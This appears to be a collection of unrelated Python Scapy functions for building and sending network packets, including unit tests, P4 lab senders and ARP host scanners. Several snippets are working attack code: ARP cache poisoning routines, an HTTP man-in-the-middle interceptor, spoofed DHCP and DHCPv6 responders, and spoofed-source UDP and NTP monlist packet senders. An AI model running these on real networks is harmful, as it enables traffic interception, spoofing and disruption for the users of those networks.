def testAll(dut): """ test with eth+IPv4+TCP+Payload""" fork(Clock(dut.clk, 6.4, 'ns').start()) dut._log.info("Running test") dut.reset_n.value =0 dut.ethBus.value =0 dut.IPv4Bus.value =0 dut.payload_in_data.value =0 dut.tcpBus.value =0 yield ClockCycles(dut.clk, 10) dut.reset_n.value =1 dut._log.info("end Rst") dut.ethBus.value =int.from_bytes(raw(Ether(src="aa:aa:aa:aa:aa:aa", dst='11:11:11:11:11:11', type="IPv4")), 'little') dut.IPv4Bus.value =int.from_bytes(raw(IP(src="192.168.1.1", dst="192.168.1.2")), 'little') dut.tcpBus.value =int.from_bytes(raw(TCP(sport=80, dport=12000)), 'little') dut.payload_in_data.value =int(0xDEADBEEFDEADBEEF) yield ClockCycles(dut.clk, 15) yield ClockCycles(dut.clk, 1) yield ClockCycles(dut.clk, 15) dut._log.info("end Test")
def handle_pkt(pkt): NTP_MONLIST_RESPONSE = "\xd7\x00\x03\x2a" + "\x00\x01\x00\x24" + "\x00" * 64 if IP in pkt and UDP in pkt and pkt[IP].src != h2_ip: src_mac = pkt[Ether].src dst_mac = pkt[Ether].dst src_ip = pkt[IP].src dst_ip = pkt[IP].dst proto = pkt[IP].proto sport = pkt[UDP].sport dport = pkt[UDP].dport id_tup = (src_ip, dst_ip, proto, sport, dport) if src_ip in VALID_IPS: if id_tup not in totals: totals[id_tup] = 0 totals[id_tup] += 1 print("Received from %s total: %s" % (id_tup, totals[id_tup])) # Respond with random payload p = Ether(dst=src_mac, src=dst_mac) / IP(dst=pkt[IP].src, src=pkt[IP].dst) p = p / UDP(dport=pkt[UDP].sport, sport=123) / NTP(NTP_MONLIST_RESPONSE) print p.show() sendp(p, iface="eth0", loop=0)
def test_single_dns_resp_packet(): packets = [ Ether(src="ab:ab:ab:ab:ab:ab", dst="12:12:12:12:12:12") / IP(src="127.0.0.1", dst="192.168.1.1") / UDP(sport=80, dport=53) / DNS(rd=1, qd=DNSQR(qtype="A", qname="google.com"), an=DNSRR(rdata="123.0.0.1")) ] events = list(packets_to_datasource_events(packets).events()) assert len(events) == 1 assert events[0]["src_mac"] == "ab:ab:ab:ab:ab:ab" assert events[0]["dst_mac"] == "12:12:12:12:12:12" assert events[0]["src_ip"] == "127.0.0.1" assert events[0]["dst_ip"] == "192.168.1.1" assert events[0]["sport"] == 80 assert events[0]["dport"] == 53 assert events[0]["qname"] == "google.com." assert events[0]["qanswer"] == "123.0.0.1" assert events[0]["qtype"] == "A" assert events[0]["event_type"] == "DNS"
def test_single_http_packet(): packets = [ Ether(src="ab:ab:ab:ab:ab:ab", dst="12:12:12:12:12:12") / IP(src="127.0.0.1", dst="192.168.1.1") / TCP(sport=12345, dport=80) / HTTP() / HTTPRequest(Method="GET", Path="/foo", Host="https://google.com") ] events = list(packets_to_datasource_events(packets).events()) assert len(events) == 1 assert events[0]["src_mac"] == "ab:ab:ab:ab:ab:ab" assert events[0]["dst_mac"] == "12:12:12:12:12:12" assert events[0]["src_ip"] == "127.0.0.1" assert events[0]["dst_ip"] == "192.168.1.1" assert events[0]["sport"] == 12345 assert events[0]["dport"] == 80 assert events[0]["http_method"] == "GET" assert events[0]["uri"] == "/foo" assert events[0]["http_dest"] == "https://google.com" assert events[0]["event_type"] == "HTTPRequest"
def main(): src_ip = get_if_addr("eth0") r = redis.Redis(unix_socket_path='/var/run/redis/redis.sock') fmt = src_ip + "*" key = r.keys(fmt) dst_ip_list = [] for i in key: dst_ip_list.append((str.split(i, "+"))[1]) dst_ip_list = set(dst_ip_list) dst_ip = random.sample(dst_ip_list, 1) fmt = src_ip + "+" + dst_ip[0] + "*" key = r.keys(fmt) route_info = random.sample(key, 1) dst_ip, dst_mac, sr = get_route(route_info[0]) iface = get_if() pkt = Ether(src=get_if_hwaddr(iface), dst=dst_mac, type=1792) pkt = pkt / sr / '\x08\x00' / IP(dst=dst_ip) / UDP( dport=1234, sport=random.randint(49152, 65535)) / "777777777" pkt.show2() sendp(pkt, iface=iface, verbose=False)
def scanner(bd, lan, periodo): prox = time.time() while True: # creacion trama de capa 2 para broadcast con solicitud ARP arp = ARP(pdst=lan) ether = Ether(dst="ff:ff:ff:ff:ff:ff") paquete = ether / arp # envio de paquetes en capa 2 resultado = srp(paquete, timeout=3, verbose=0)[0] # actualizacion de estados for enviado, recibido in resultado: bd.actualizarAparicion( recibido.hwsrc, datetime.datetime.now()) # mac de conectado y timestamp actual # hilo duerme hasta prox pasada prox = prox + periodo time.sleep(prox - time.time())
def send_thread(addr, iface): global cwnd, currently_sent, lock, count_sent_packets curr_seq_no = 1 counter = 1 while (count_sent_packets < 10000): available_to_send = cwnd - currently_sent for i in range(0, available_to_send): pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff') message = randStr(N=10) tcp_pkt = P4tcp(dstPort=1234, srcPort=2345, seqNo=curr_seq_no, ackNo=1, dataPayload=message) pkt = pkt / IP(dst=addr, proto=P4TCP_PROTOCOL) / tcp_pkt sendp(pkt, iface=iface, verbose=False) print_packet(tcp_pkt) curr_seq_no = curr_seq_no + PAYLOAD_LENGTH counter = counter + 1 count_sent_packets = count_sent_packets + available_to_send lock.acquire() currently_sent = currently_sent + available_to_send lock.release()
def netScanner(target_ip): # targetip Address for the destination # create ARP packet arp = ARP(pdst=target_ip) # create the Ether broadcast packet # ff:ff:ff:ff:ff:ff MAC address indicates broadcasting ether = Ether(dst="ff:ff:ff:ff:ff:ff") packet = ether / arp result = srp(packet, timeout=3, verbose=0)[0] # a list of clients clients = [] for sent, received in result: # for each response, append ip and mac address to `clients` list clients.append({'ip': received.psrc, 'mac': received.hwsrc}) # print clients print(FAIL + "\t\tAvailable Devices in the Network" + ENDC) print("\t\t{1}--------------------------------{0}".format(ENDC, WARNING)) print("\t\t {1}IP{0}".format(ENDC, UNDERLINE) + " " * 18 + "{1}MAC{0}".format(ENDC, UNDERLINE)) for client in clients: print("\t\t{:16} {}".format(client['ip'], client['mac']))
def getFloodPacketList(self, pkt): self.intfLock.acquire() pktList = [] receiveIP = pkt[IP].src for intf in self.pwospf_intfs: for neighborIP in intf.neighbors.keys(): if (neighborIP == receiveIP): continue #TODO: Uncomment this #TODO: Checksum is wrong pktList.append( Ether() / CPUMetadata(fromCpu=1, origEtherType=0x800) / IP(src=intf.ip, dst=neighborIP, proto=89) / Pwospf(type=4, length=pkt[Pwospf].length, routerId=pkt[Pwospf].routerId, areaId=pkt[Pwospf].areaId, checksum=0) / LSU(seq=pkt[LSU].seq, ttl=pkt[LSU].ttl, lsuAdList=pkt[LSU].lsuAdList)) self.intfLock.release() if not pktList: return None return copy.deepcopy(pktList)
def sendPacket(my_mac, gateway_ip, target_ip, target_mac): # Function for sending the malicious ARP packets out with the specified data ether = Ether() ether.src = my_mac arp = ARP() arp.psrc = gateway_ip arp.hwsrc = my_mac arp = arp arp.pdst = target_ip arp.hwdst = target_mac ether = ether ether.src = my_mac ether.dst = target_mac arp.op = 2 packet = ether / arp sendp(x=packet, verbose=False)
def main(argv): try: opts, args = getopt.getopt(sys.argv[1:],'s:e:',['start=','end=']) except getopt.GetoptError: sys.exit(2) for opt, arg in opts: if opt =='-s': start = int(arg) elif opt =='-e': end = int(arg) if start == '': sys.exit() if end == '': sys.exit() interface = popen('ifconfig | awk \'/eth0/ {print $1}\'').read() ip_dst = gendest(start, end) ip_src = sourceIPgen() udp_packets = Ether()/IP(dst=ip_dst, src=ip_src,ttl=18)/UDP(dport=80,sport=2) sendp(udp_packets, iface=interface.rstrip(), inter=0.05) print(repr(udp_packets))
def interceptor(p): """handler of intercepted packets""" # APR packet if p.haslayer(ARP) and p[ARP].op == 1: self._poison_client_arp_cache() # TCP/HTTP handshake (SYN) packet elif p.haslayer(TCP) and str(p[TCP].flags) == "S" and \ p[IP].src == self.client_ip and p[IP].dst == self.http_ip: self._mitm_tcp_handshake(p) # HTTP Request packet elif p.haslayer(TCP) and p.haslayer(HTTPRequest): self._mitm_http_req(p) # FIN (connection teardown) elif p.haslayer(TCP) and str(p[TCP].flags) == "FA": self._poison_client_arp_cache(verbose=False) l2_l3 = Ether(src=self.attacker_mac, dst=self.client_mac) / \ IP(src=self.http_ip, dst=self.client_ip) ack = TCP(dport=p[TCP].sport, sport=p[TCP].dport, flags="A", seq=p.ack, ack=p.seq + 1) sendp(l2_l3 / ack, verbose=False)
def host_scanner(): """With scapy, return all online hosts.""" online_strangers = {} collection = [] try: ans, _ = srp(Ether(dst='ff:ff:ff:ff:ff:ff') / ARP(pdst=ip_range), retry=scan_retries, timeout=scan_timeout) except PermissionError: print('Please run with elevated permissions.') sys.exit(1) for snd, rcv in ans: result = rcv.sprintf(r'%ARP.psrc% %Ether.src%').split() collection.append(result) for host in collection: ip, mac = tuple(host) if mac not in whitelist_dict.keys(): # UNKNOWN is a remnant of returned arp-scan values, left in for future enhancements online_strangers[mac] = {'name': 'UNKNOWN', 'ip': ip} return online_strangers
def pkt_callback(pkt): if pkt.haslayer(Dot11): if pkt.type == 0 and pkt.subtype == 8: ssid = pkt.info try: extra = pkt.notdecoded rssi = -(256 - ord(extra[-4:-3])) except: rssi = 0 addr = "10.0.3.3" iface = get_if(sys.argv[1]) if int(rssi) > -70: pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff') pkt = pkt / IP(dst=addr) / \ TCP(dport=1234, sport=random.randint(49152, 65535)) \ / P4wifi(rssi=abs(rssi)) pkt.show() sendp(pkt, iface=iface, verbose=False)
def sendPacket(my_mac, gateway_ip, target_ip, target_mac): ether = Ether() ether.src = my_mac arp = ARP() arp.psrc = gateway_ip arp.hwsrc = my_mac arp = arp arp.pdst = target_ip arp.hwdst = target_mac ether = ether ether.src = my_mac ether.dst = target_mac arp.op = 2 def broadcastPacket(): packet = ether / arp sendp(x=packet, verbose=False) broadcastPacket()
def followUpPkt(): #lastPktTime = time.time_ns() lastPktTime = int(round(time.time() * 1000 * 1000 * 1000)) #accurate rate : naro second(10^-9) DPSync = DPSyncTag( etherType = 0x9487, opCode = 0b0001, reserved = 0, originalPort = 0 ) TS = TS_Payload( TS1 = lastPktTime, TS2 = 0, TS3 = 0, TS4 = 0 ) pkt = Ether(src=get_if_hwaddr(iface), type=0x9487, dst='ff:ff:ff:ff:ff:ff') pkt =pkt / IP(dst=addr) / DPSync / TS pkt.show() hexdump(pkt) sendp(pkt, iface=iface, verbose=False)
def main(args, proto, host): """Main fn""" # Currently we work with directly connected subnets for net, mask, gwy, iface, saddr in conf.route.routes: if atol(host.addr) & mask == net and gwy == '0.0.0.0': # ARP ping the IP to find the dst.MAC arpres = srp1(Ether(dst='ff:ff:ff:ff:ff:ff') / ARP(pdst=host.addr), iface=iface, verbose=0, timeout=0.1, retry=10) if arpres is None: print 'Host {} is not yet up. Retry later'.format(host.addr) return rewriteinfo = (proto, iface, get_if_hwaddr(iface), arpres[Ether].src, saddr, host.addr) send_pkts(args, rewriteinfo) return print 'Host {} does not belong to directly conencted subnet'.format( host.addr)
def test_03_icmp_echo_request(self): test_packet = Ether() / IPv6( src='fd91:79d3:d621::1234', dst='fdb4:98ce:52d4::42') / ICMPv6EchoRequest() self.sendp(test_packet, iface=self.IFACE_NAME_PY) packet = self.wait_for_packet( self.eth_tx, lambda packet: isinstance(packet.payload, IP) and packet.payload.dst == '5.6.7.8') assert isinstance(packet, Ether) assert_equals(packet.dst, self.py_side_mac) fou_ip = packet.payload assert isinstance(fou_ip, IP) # Expecting an IP packet assert_equals(fou_ip.src, '65.65.65.65') assert_equals(fou_ip.dst, '5.6.7.8') fou_udp = fou_ip.payload assert isinstance(fou_udp, UDP) # Expecting a FOU packet assert_equals(fou_udp.dport, self.DIRECTOR_GUE_PORT) glb_gue = fou_udp.payload assert isinstance( glb_gue, GLBGUE) # Expecting a GUE packet (scapy will always map this) assert_equals(glb_gue.private_data[0].hop_count, 1) assert_equals(glb_gue.private_data[0].next_hop, 0) assert_equals(glb_gue.private_data[0].hops, ['6.7.8.9']) inner_ip = glb_gue.payload assert isinstance(inner_ip, IPv6) # Expecting the inner IP packet assert_equals(inner_ip.src, 'fd91:79d3:d621::1234') assert_equals(inner_ip.dst, 'fdb4:98ce:52d4::42') inner_tcp = inner_ip.payload assert isinstance(inner_tcp, ICMPv6EchoRequest) # Expecting the inner ICMP packet
def scan(): try: print(colors.purple + "Interfaces:" + colors.end) for iface in netifaces.interfaces(): print(colors.yellow + iface + colors.end) interface = input(colors.purple + "Interface: " + colors.end).strip(" ") try: ip = netifaces.ifaddresses(interface)[2][0]['addr'] except (ValueError, KeyError): printError("Invalid interface!") return ips = ip + "/24" printInfo("Scanning...") start_time = datetime.now() conf.verb = 0 try: ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ips), timeout=2, iface=interface, inter=0.1) except PermissionError: printError('Permission denied!') return for snd, rcv in ans: print( rcv.sprintf(colors.yellow + "r%Ether.src% - %ARP.psrc%" + colors.end)) stop_time = datetime.now() total_time = stop_time - start_time printSuccess("Scan completed!") printSuccess("Scan duration: " + str(total_time)) except KeyboardInterrupt: printInfo("Network scanner terminated!")
def scan_network(filename, index, print_results=False, load_to_elastic=True): current_time = datetime.datetime.utcnow().isoformat() print("Starting at "+ current_time) print("scanning....") clientname = ([l for l in ([ip for ip in socket.gethostbyname_ex(socket.gethostname())[2] if not ip.startswith("127.")][:1], [[(s.connect(('8.8.8.8', 53)), s.getsockname()[0], s.close()) for s in [socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1]]) if l][0][0]) target_ip = (clientname+"/24") domain = get_domain(clientname) arp = ARP(pdst=target_ip) ether = Ether(dst="ff:ff:ff:ff:ff:ff") packet = ether/arp result = srp(packet, timeout=3, verbose=0)[0] clients = [] for sent, received in result: client = {'@timestamp': current_time, 'client' : { 'ip': received.psrc, 'mac': received.hwsrc, 'name': socket.getfqdn(received.psrc), 'domain' : domain } } clients.append(client) if print_results: print("IP" + " "*18 +"MAC" + " "*19 + "Host Name") for client in clients: print("{:16} {} {}".format(client['client']['ip'], client['client']['mac'], client['client']['name'])) if load_to_elastic: send_to_elastic(clients, filename, index) print('Scan Complete')
def main(): if len(sys.argv) < 2: print 'pass 2 arguments: <destination>' exit(1) addr = socket.gethostbyname(sys.argv[1]) iface = get_if() print "sending on interface %s to %s" % (iface, str(addr)) while True: print s = str(raw_input('Define Message Type: 3(PUB), 8(SUB), 10(UNSUB) ')) if s == "q": break print pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff') try: pkt = pkt / MQTT(message_type=int(s), DUP=0, QoS=0, R=0) except ValueError as e: print '[MQTT]' + e pass s = str(raw_input('Define Topic Type: 0~2^16-1 ')) if s == "q": break print try: pkt = pkt / Topic(topic=int(s), debug=int(0)) except ValueError as e: print '[Topic]' + e pass pkt = pkt / IP(dst=addr) / TCP(dport=4321, sport=1234) pkt.show2() sendp(pkt, iface=iface, verbose=True)
def test_01_route_classified_v4(self): test_packet = Ether( dst='56:0e:37:46:a2:21', src='b6:59:5f:11:c1:2a') / IP( src="10.11.12.13", dst="1.1.1.1") / TCP(sport=45678, dport=80) self.sendp(test_packet, iface=self.IFACE_NAME_PY) packet = self.wait_for_packet( self.eth_tx, lambda packet: isinstance(packet.payload, IP) and packet.payload.dst == '3.4.5.6') assert isinstance(packet, Ether) assert_equals(packet.dst, self.py_side_mac) fou_ip = packet.payload assert isinstance(fou_ip, IP) # Expecting an IP packet assert_equals(fou_ip.src, '65.65.65.65') assert_equals(fou_ip.dst, '3.4.5.6') fou_udp = fou_ip.payload assert isinstance(fou_udp, UDP) # Expecting a FOU packet assert_equals(fou_udp.sport, self.sport_for_packet(test_packet)) assert_equals(fou_udp.dport, self.DIRECTOR_GUE_PORT) glb_gue = fou_udp.payload assert isinstance( glb_gue, GLBGUE) # Expecting a GUE packet (scapy will always map this) assert_equals(glb_gue.private_data[0].hop_count, 1) assert_equals(glb_gue.private_data[0].next_hop, 0) assert_equals(glb_gue.private_data[0].hops, ['2.3.4.5']) inner_ip = glb_gue.payload assert isinstance(inner_ip, IP) # Expecting the inner IP packet assert_equals(inner_ip.dst, '1.1.1.1') inner_tcp = inner_ip.payload assert isinstance(inner_tcp, TCP) # Expecting the inner TCP packet assert_equals(inner_tcp.dport, 80)
def test_03_icmp_echo_request(self): test_packet = Ether() / IP(src="10.11.12.13", dst="1.1.1.1") / ICMP( type=8, code=0) self.sendp(test_packet, iface=self.IFACE_NAME_PY) packet = self.wait_for_packet( self.eth_tx, lambda packet: isinstance(packet.payload, IP) and packet.payload.dst == '3.4.5.6') assert isinstance(packet, Ether) assert_equals(packet.dst, self.py_side_mac) fou_ip = packet.payload assert isinstance(fou_ip, IP) # Expecting an IP packet assert_equals(fou_ip.src, '65.65.65.65') assert_equals(fou_ip.dst, '3.4.5.6') fou_udp = fou_ip.payload assert isinstance(fou_udp, UDP) # Expecting a FOU packet assert_equals(fou_udp.dport, self.DIRECTOR_GUE_PORT) glb_gue = fou_udp.payload assert isinstance( glb_gue, GLBGUE) # Expecting a GUE packet (scapy will always map this) assert_equals(glb_gue.private_data[0].hop_count, 1) assert_equals(glb_gue.private_data[0].next_hop, 0) assert_equals(glb_gue.private_data[0].hops, ['2.3.4.5']) inner_ip = glb_gue.payload assert isinstance(inner_ip, IP) # Expecting the inner IP packet assert_equals(inner_ip.src, '10.11.12.13') assert_equals(inner_ip.dst, '1.1.1.1') inner_tcp = inner_ip.payload assert isinstance(inner_tcp, ICMP) # Expecting the inner ICMP packet assert_equals(inner_tcp.type, 8) assert_equals(inner_tcp.code, 0)
def test_01_route_classified_v6(self): test_packet = Ether() / IPv6(src='fd91:79d3:d621::1234', dst='fdb4:98ce:52d4::42') / TCP( sport=45678, dport=80) self.sendp(test_packet, iface=self.IFACE_NAME_PY) packet = self.wait_for_packet( self.eth_tx, lambda packet: isinstance( packet.payload, IP) and isinstance(packet.payload.payload, UDP) and packet.payload.payload.dport == self.DIRECTOR_GUE_PORT) fou_ip = packet.payload assert isinstance(fou_ip, IP) # Expecting an IP packet assert_equals(fou_ip.src, '65.65.65.65') assert_equals(fou_ip.dst, '5.6.7.8') fou_udp = fou_ip.payload assert isinstance(fou_udp, UDP) # Expecting a FOU packet assert_equals(fou_udp.sport, self.sport_for_packet(test_packet)) assert_equals(fou_udp.dport, self.DIRECTOR_GUE_PORT) glb_gue = fou_udp.payload assert isinstance( glb_gue, GLBGUE) # Expecting a GUE packet (scapy will always map this) assert_equals(glb_gue.private_data[0].hop_count, 1) assert_equals(glb_gue.private_data[0].next_hop, 0) assert_equals(glb_gue.private_data[0].hops, ['6.7.8.9']) inner_ip = glb_gue.payload print repr(inner_ip) assert isinstance(inner_ip, IPv6) # Expecting the inner IPv6 packet assert_equals(inner_ip.src, 'fd91:79d3:d621::1234') assert_equals(inner_ip.dst, 'fdb4:98ce:52d4::42') inner_tcp = inner_ip.payload assert isinstance(inner_tcp, TCP) # Expecting the inner TCP packet assert_equals(inner_tcp.dport, 80)
def run(self): debug('ARP cache poisoning thread waiting for victims...') ip = q.get() debug('Acquired first victim... %s' % ip) pe = Ether(src=self.mac, dst=self.rmac) pa = ARP(op='who-has', hwsrc=self.mac, psrc=ip, pdst=ip, hwdst=self.rmac) oldmac = self.whohas(ip) oldip = ip while True: try: ip = q.get_nowait() if oldmac is not None: debug('Healing victim %s/%s' % (oldip, oldmac)) pa.psrc = oldip pa.hwsrc = oldmac sendp(pe / pa, verbose=0) if ip is None: break else: debug('Changing victim to %s...' % ip) pa.psrc = ip pa.hwsrc = self.mac oldip = ip oldmac = self.whohas(ip) except Empty: # Send the poison... all your base are belong to us! debug('Poisoning %s...' % ip) sendp(pe / pa, verbose=0) sleep(1 / self.poison_rate)
def handle_packet(packet): eth = packet.getlayer(Ether) ip = packet.getlayer(IP) udp = packet.getlayer(UDP) bootp = packet.getlayer(BOOTP) dhcp = packet.getlayer(DHCP) dhcp_message_type = None if not dhcp: return False for opt in dhcp.options: if opt[0] == "message-type": dhcp_message_type = opt[1] # dhcp request if dhcp_message_type == 3: client_ip = client_net + str(random.randint(2,254)) dhcp_ack = Ether(src=eth.dst, dst=eth.src) / \ IP(src=dhcpserver, dst=client_ip) / \ UDP(sport=udp.dport, dport=udp.sport) / \ BOOTP(op=2, chaddr=eth.dst, siaddr=gateway, yiaddr=client_ip, xid=bootp.xid) / \ DHCP(options=[('message-type', 5), ('requested_addr', client_ip), ('subnet_mask', '255.255.255.0'), ('router', gateway), ('name_server', nameserver), ('end')]) print("Send spoofed DHCP ACK to %s" % ip.src) sendp(dhcp_ack, iface=dev)
def test_01_ip_range_match_v6(self): for i in [0, 1, 10, 50, 62, 63]: # fdb4:98ce:52d4::4240/122 dst_ip = "fdb4:98ce:52d4::42%02x" % (64 + i) test_packet = Ether() / IPv6(src="fd91:79d3:d621::1234", dst=dst_ip) / TCP(sport=45678, dport=80) self.sendp(test_packet, iface=self.IFACE_NAME_PY) packet = self.wait_for_packet( self.eth_tx, lambda packet: isinstance(packet.payload, IP) and packet.payload.dst == '4.5.6.7') assert isinstance(packet, Ether) assert_equals(packet.dst, self.py_side_mac) fou_ip = packet.payload assert isinstance(fou_ip, IP) # Expecting an IP packet assert_equals(fou_ip.src, '65.65.65.65') assert_equals(fou_ip.dst, '4.5.6.7') fou_udp = fou_ip.payload assert isinstance(fou_udp, UDP) # Expecting a FOU packet assert_equals(fou_udp.sport, self.sport_for_packet(test_packet)) assert_equals(fou_udp.dport, self.DIRECTOR_GUE_PORT) glb_gue = fou_udp.payload assert isinstance( glb_gue, GLBGUE) # Expecting a GUE packet (scapy will always map this) inner_ip = glb_gue.payload assert isinstance(inner_ip, IPv6) # Expecting the inner IP packet assert_equals(inner_ip.dst, dst_ip) inner_tcp = inner_ip.payload assert isinstance(inner_tcp, TCP) # Expecting the inner TCP packet assert_equals(inner_tcp.dport, 80)
def main(): if len(sys.argv) < 3: print 'pass 2 arguments: <destination> "<message>"' exit(1) addr = socket.gethostbyname(sys.argv[1]) iface = get_if() print "sending on interface %s to %s" % (iface, str(addr)) pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff') pkt = pkt / IP(dst=addr, options=IPOption_DRIP( count=0, swtraces=[])) / UDP( dport=4321, sport=1234) / sys.argv[2] #random.randint(49152,65535) for sport pkt.show2() #Wrap this in a repeated loop for how long the timer indicates try: for i in range(int(sys.argv[3])): sendp(pkt, iface=iface) sleep(1) except KeyboardInterrupt: raise
def main(): if len(sys.argv) < 4: print 'pass 3 arguments: <op> <keyhash> "<message>" (node, load)' exit(1) op = int(sys.argv[1]) keyhash = int(sys.argv[2]) msg = sys.argv[3] node = 0 load = 0 if len(sys.argv) >= 6: node = int(sys.argv[4]) load = int(sys.argv[5]) dst_ip = server_ip src_ip = client_ip pkt = Ether(src=client_mac, dst=server_mac) pkt = pkt / IP(dst=dst_ip, src=src_ip) pkt = pkt / UDP(dport=12345, sport=random.randint(49152, 65535)) pkt = pkt / Pegasus(op=op, keyhash=keyhash, node=node, load=load) pkt = pkt / msg pkt.show2() sendp(pkt, iface=client_iface, verbose=False)
def send_dhcp_reply(p, basep): resp = Ether(dst=basep.src) / IPv6(src=config.selfaddr, dst=basep[IPv6].src) / UDP( sport=547, dport=546) #base packet resp /= DHCP6_Reply(trid=p.trid) #resp /= DHCP6OptPref(prefval = 255) resp /= DHCP6OptClientId(duid=p[DHCP6OptClientId].duid) resp /= DHCP6OptServerId(duid=config.selfduid) resp /= DHCP6OptDNSServers(dnsservers=[config.selfaddr]) if config.localdomain: resp /= DHCP6OptDNSDomains(dnsdomains=[config.localdomain]) try: opt = p[DHCP6OptIAAddress] resp /= DHCP6OptIA_NA(ianaopts=[opt], T1=200, T2=250, iaid=p[DHCP6OptIA_NA].iaid) sendp(resp, iface=config.default_if, verbose=False) except IndexError: # Some hosts don't send back this layer for some reason, ignore those if config.debug or config.verbose: print( 'Ignoring DHCPv6 packet from %s: Missing DHCP6OptIAAddress layer' % basep.src)